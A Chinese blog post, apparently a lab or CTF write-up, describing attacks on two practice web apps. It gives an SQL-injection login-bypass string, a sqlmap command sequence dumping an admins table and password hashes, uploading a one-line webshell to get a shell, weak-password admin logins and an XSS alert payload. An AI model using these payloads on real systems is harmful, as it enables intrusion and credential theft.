记一次漏洞挖掘
题目一:PHP网页
0x01 SQl注入
OWASP扫描,爆出sql注入漏洞
利用爆出的万能钥匙(ZAP' OR '1'='1' -- )
进行登录
登录成功
0x02 文件上传
第一步登录成功后,发现疑似上传点
直接上传一句话木马
上传成功
菜刀连接
getshell,就可以干坏事拉
0x03 SQL注入
在登录界面查询处发现疑似sql注入处
抓包发现变量名
sqlmap一键注入
1.查询数据库
python sqlmap.py -u http://172.16.12.253/grade/query.php?user=1 --dbs
2.查询grade数据库中表名
python sqlmap.py -u http://172.16.12.253/grade/query.php?user=1 --tables -D grade
3.查询grade库中admins表中的字段
python sqlmap.py -u http://172.16.12.253/grade/query.php?user=1 --columns -T admins -D grade
4.查询grade库中admins表中的字段id,name,pass
python sqlmap.py -u http://172.16.12.253/grade/query.php?user=1 --dump -C "id,name,pass" -T admins -D grade
5.爆破phpmyadmin后台密码
python sqlmap.py -u http://172.16.12.253/grade/query.php?user=1 --users --password
直接登录后台 账号:root 密码:123456
登录成功
0X04 XSS
反射型Xss <全称跨站脚本攻击,是一种在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。>
OWASP ZAP扫描发现XSS
输入<script>alert(/Two groups the strongest/)</script>
成功弹框
题目二:JS网页
0x01 后台
百度搜索JSPGOU
框架得到后台地址
访问后台地址
尝试弱口令登录 账号:admin 密码:123456
登录成功
0x02 XSS
输入<script>alert(/Two groups the strongest/)</script>
成功弹窗
0x03 文件上传
在后台发现上传点,可直接上传文件
参考: http://www.dengtar.com/5148.html https://www.codercto.com/a/63186.html
相关文章
- K2P刷padavan教程
- 常用dig命令
- 2018年了,你在用什么浏览器,我在用什么浏览器
- 正确下载youtube视频的方式
- Windows激活工具的研究学习
- 单循环链表
- 穿墙神器frp的安装与配置
- 修复nginx空主机头的问题
- V2上看到一个很棒的网站 nginxconfig.io
- KMP算法笔记I ----- 先学会朴素算法
- 使用Acme工具配置Let's Encrypt通配符HTTPS证书
- docker 最新安装命令
- 如何使用openldap搭建LDAP服务篇1--初见LDAP
- 抖音的学习研究
- 从零开始编译wow私服
- Charles的代理设置
- 炉石传说有多少张卡牌
- chrome再一次隐藏了http(s)和www
- 关于攒机和买笔记本的建议
- 记一次网站升级